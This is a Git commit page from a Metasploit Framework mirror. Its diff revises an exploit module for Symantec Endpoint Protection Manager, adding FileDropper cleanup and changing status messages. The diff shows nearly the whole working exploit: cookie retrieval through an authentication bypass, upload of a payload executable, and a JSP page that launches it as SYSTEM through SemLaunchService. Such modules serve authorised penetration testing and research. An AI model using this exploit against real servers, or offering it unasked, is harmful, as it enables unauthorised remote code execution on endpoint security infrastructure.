infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do ruby fixing and use FileDropper

bug/bundler_fix
jvazquez-r7 2015-08-14 17:00:27 -05:00
parent 74ed8cf0c9
commit 4aa3be7ba2
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 28 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
modules/exploits/windows/http/sepm_auth_bypass_rce.rb
View File

@ -8,20 +8,21 @@ require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "Symantec Endpoint Protection Manager Auth Bypass and RCE", 'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
'Description' => %q{ 'Description' => %q{
This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'bperry', #metasploit module 'Markus Wulftange', #discovery
'Markus Wulftange' #discovery 'bperry' # metasploit module
], ],
'References' => 'References' =>
[ [
@ -36,12 +37,14 @@ class Metasploit4 < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { [ 'Automatic',
{
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'Payload' => { 'Payload' => {
'DisableNops' => true 'DisableNops' => true
} }
} ], }
],
], ],
'Privileged' => true, 'Privileged' => true,
'DisclosureDate' => 'Jul 31 2015', 'DisclosureDate' => 'Jul 31 2015',
@ -58,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Remote
meterp = Rex::Text.rand_text_alpha(10) meterp = Rex::Text.rand_text_alpha(10)
jsp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10)
print_status("Getting cookie") print_status("#{peer} - Getting cookie...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
@ -70,21 +73,21 @@ class Metasploit4 < Msf::Exploit::Remote
} }
}) })
unless res unless res && res.code == 200
fail_with(Failure::Unknown, 'The server did not respond in an expected way') fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
end end
cookie = res.get_cookies cookie = res.get_cookies
if cookie == nil || cookie == '' if cookie.nil? || cookie.empty?
fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.') fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
end end
exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%> exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
} }
print_status('Uploading payload...') print_status("#{peer} - Uploading payload...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST', 'method' => 'POST',
@ -100,10 +103,12 @@ class Metasploit4 < Msf::Exploit::Remote
}) })
unless res && res.code == 200 unless res && res.code == 200
fail_with(Failure::Unknown, 'Server did not respond in an expected way') fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end end
print_status("Uploading JSP page to execute the payload...") register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")
print_status("#{peer} - Uploading JSP page to execute the payload...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
'method' => 'POST', 'method' => 'POST',
@ -119,12 +124,14 @@ class Metasploit4 < Msf::Exploit::Remote
}) })
unless res && res.code == 200 unless res && res.code == 200
fail_with(Failure::Unknown, 'Server did not respond in an expected way.') fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
end end
print_status('Executing payload. Manual cleanup will be required.') register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")
print_status("#{peer} - Executing payload. Manual cleanup will be required.")
send_request_cgi({ send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
}) }, 5)
end end
end end